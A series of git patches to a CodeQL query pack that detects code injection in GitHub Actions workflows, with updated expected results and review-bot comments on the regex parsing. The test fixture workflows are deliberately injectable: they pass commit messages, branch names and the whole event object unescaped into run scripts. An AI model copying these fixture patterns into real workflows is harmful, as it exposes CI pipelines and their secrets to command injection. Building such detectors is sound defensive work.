(PR) + uses: sonarsource/sonarcloud-github-action@master + if: 
env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost From ae5b8bc0acfd64438232cdbe4bfc4b524d2849c7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:45 +0200 Subject: [PATCH 0154/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf0..f775d751164 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.7 +version: 0.0.8 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ac6083b7d6d..2db4c237da3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.7 +version: 0.0.8 groups: - actions - queries From 58b21d46849af2035327b1257554114e5eaeb972 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:52:13 +0200 Subject: [PATCH 0155/1267] Improve assignments to GITHUB ENVARS detection --- ql/lib/codeql/actions/Ast.qll | 45 +++++++------------ ql/test/library-tests/test.expected | 7 ++- ql/test/library-tests/test.ql | 3 ++ .../CWE-094/.github/workflows/test.yml | 16 ++++++- .../Security/CWE-094/CodeInjection.expected | 26 ++++++++--- .../CWE-094/PrivilegedCodeInjection.expected | 28 ++++++++---- 6 files changed, 74 insertions(+), 51 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e0da57adb6f..bbf5c86fb95 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -19,40 +19,25 @@ module Utils { ] } + bindingset[str] + string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") + } + bindingset[line, var] predicate extractAssignment(string line, string var, string key, string value) { exists(string assignment | - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^'", "") - .regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - ) and - key = assignment.splitAt("=", 0).trim() and - value = assignment.splitAt("=", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) or - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + - "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", - 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", - 2) - ) and - key = assignment.splitAt("::", 0).trim() and - value = assignment.splitAt("::", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value 
= trimQuotes(assignment.splitAt("::", 1)) ) } diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 639fbd4c530..aa2ccdcfe9c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -428,8 +428,6 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv -| "sha1 | $(> $GITHUB_OUTPUT", "echo 'sha2=$(> $GITHUB_OUTPUT", "echo sha3=$(> $GITHUB_OUTPUT", + "echo sha4=$(> \"$GITHUB_OUTPUT\"", + "echo sha5=$(> ${GITHUB_OUTPUT}", + "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and Utils::extractAssignment(t, "OUTPUT", key, value) ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index b9fa152e49a..153ebc5b733 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -5,7 +5,7 @@ jobs: runs-on: ubuntu-latest outputs: - job_output: ${{ steps.step2.outputs.test }} + job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 @@ -24,7 +24,19 @@ jobs: - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} - run: echo "test=$MSG" >> "$GITHUB_OUTPUT" + run: echo "MSG2=$MSG" >> "$GITHUB_OUTPUT" + - id: step3 + env: + MSG2: ${{steps.step2.outputs.MSG2}} + run: echo "MSG3=$MSG2" >> "${GITHUB_OUTPUT}" + - id: step4 + env: + MSG3: ${{steps.step3.outputs.MSG3}} + run: echo "MSG4=$MSG3" >> ${GITHUB_OUTPUT} + - id: step5 + env: + MSG4: ${{steps.step4.outputs.MSG4}} + run: echo "MSG5=$MSG4" >> $GITHUB_OUTPUT job2: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index d2e188ead67..1a12b8e7277 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
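Review bot: In the rewritten `extractAssignment`, `key` and `value` are still taken with `assignment.splitAt("=", 0)` and `assignment.splitAt("=", 1)`, so a value that itself contains `=` is cut at the second `=` and the remainder never reaches the checks that inspect `value`. For a constructed assignment such as `URL=https://host/?q=$(cat file)`, only `https://host/?q` would be returned, and the file-read and expression-containment sinks (which presumably consume this value) would miss it. Splitting on the first `=` only avoids the truncation, e.g. `key = trimQuotes(assignment.regexpCapture("([^=]*)=(.*)", 1))` and `value = trimQuotes(assignment.regexpCapture("([^=]*)=(.*)", 2))`. The leftover `.regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "")` on the `::set-` branch is also redundant now that `trimQuotes` is applied to both parts.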
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| 
.github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | 
@@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: 
step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bc1fd870950..f4df15ae344 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| 
.github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | 
@@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: 
step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | 
@@ -297,7 +309,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 5968da87bb807a187099fd103c2311e8ac66f9af Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:53:39 +0200 Subject: [PATCH 0156/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f775d751164..c1d32a1f817 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.8 +version: 0.0.9 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2db4c237da3..134b0db2b17 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.8 +version: 0.0.9 groups: - actions - queries From 8d2b8be133ff0f088d70baab96cb0ba8ad5762aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Apr 2024 22:32:49 +0200 Subject: [PATCH 0157/1267] Add github.event as a source --- .../codeql/actions/dataflow/FlowSources.qll | 8 +++++++ .../CWE-094/.github/workflows/simple3.yml | 23 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 37 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120..e07b9f76762 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -22,6 +22,13 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } +bindingset[context] +private predicate isExternalUserControlled(string context) { + exists(string reg | reg = "github\\.event" | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + bindingset[context] private predicate isExternalUserControlledIssue(string context) { exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | @@ -123,6 +130,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlled(context) or isExternalUserControlledIssue(context) or isExternalUserControlledPullRequest(context) or isExternalUserControlledReview(context) or diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml new file mode 100644 index 00000000000..be1559d4711 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -0,0 +1,23 @@ +on: + workflow_run: + workflows: + - 'prev' + types: + - completed + +permissions: + actions: read + checks: read + contents: read + +jobs: + echo_trigger: + name: Report changes + runs-on: ubuntu-latest + steps: + - name: Echo trigger + run: | + echo "head branch: ${{ github.event.workflow_run.head_branch }}" + cat << EOF + ${{ toJSON(github.event) }} + EOF diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1a12b8e7277..a300f4dd11e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
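Review bot: `isExternalUserControlled` in the first FlowSources.qll hunk has no QLDoc, and its regex `github\\.event` is far wider than its siblings', so its reach depends on how `Utils::wrapRegexp` anchors the pattern, which this hunk does not show. If the wrapper matches only the bare object (as the new `toJSON(github.event)` row in the expected output suggests), state that in a comment such as `/** Holds if context is the whole github.event object, e.g. serialized with toJSON. */`. If it also matches `github.event.<field>`, every event field becomes a source, including ones an external user cannot set such as numeric ids, and the specific predicates below it become redundant. The second hunk or-s it into `EventSource` ahead of the specific checks, so a fixture line for a field that must stay unflagged would pin the intended behaviour. A name like `isExternalUserControlledEvent` would also sit better next to the `…Issue` / `…PullRequest` siblings.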
@@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f4df15ae344..f025d13b1a9 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | 
